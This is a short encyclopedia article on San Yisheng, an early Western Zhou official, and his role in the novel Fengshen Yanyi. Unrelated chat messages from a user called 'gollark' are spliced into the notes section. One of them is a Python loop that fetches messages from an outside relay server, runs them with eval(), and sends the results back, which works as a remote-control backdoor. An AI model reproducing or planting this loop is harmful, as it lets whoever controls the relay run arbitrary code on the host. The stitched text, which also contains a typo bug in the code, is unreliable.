San Yisheng

San Yisheng (Chinese: 散宜生; pinyin: Sǎn Yìshēng; fl. 11th century BC) was a top official of the early Western Zhou dynasty.[1]

San Yisheng

Plot in Fengshen Yanyi

Grand Counselor San has been renowned as the protector of both the Ji province and Ji Chang of Mount Singing Phoenix – who he has served for many upon many years. Throughout the many contributions of Commander/Grand Counselor San, he would be most remembered for subduing Chong Houhu's coalition with a simple letter of rationality during the Su Hu arc. Even after Ji Chang had been imprisoned for over the time of seven years, San Yisheng would continue to remain as a loyal sword of the Ji province.

Once the news of Bo Yikao's death had reached the ears of the people of Mount Singing Phoenix, San would be the first to console the people and create a rational conclusion. The top priority would be to retrieve Ji Chang, and not go to war against the Shang dynasty yet. Thus, San would compose a letter to Supreme Counselors Fei Zhong and You Hun and effectively attain their consent that Ji Chang should be released for his loyalty and devotion to the king.

Notes

  1. See, e.g., Lüshi Chunqiu, Vol.5.
gollark: I don't think I ever go around *manually* fiddling with tree structures (unless you count source code, which could be represented various different ways).
gollark: It's basically an infinite 2D grid of bad computers with 256B of RAM.
gollark: I made a "usable" esolang, for certain definitions of "usable".
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: try: send(repr(eval(data["result"]["data"]))) except Exception as e: end(repr(e))```Here is a small version if you want that.
gollark: However, imagine disutilization of internet protocol version 6.

References

This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.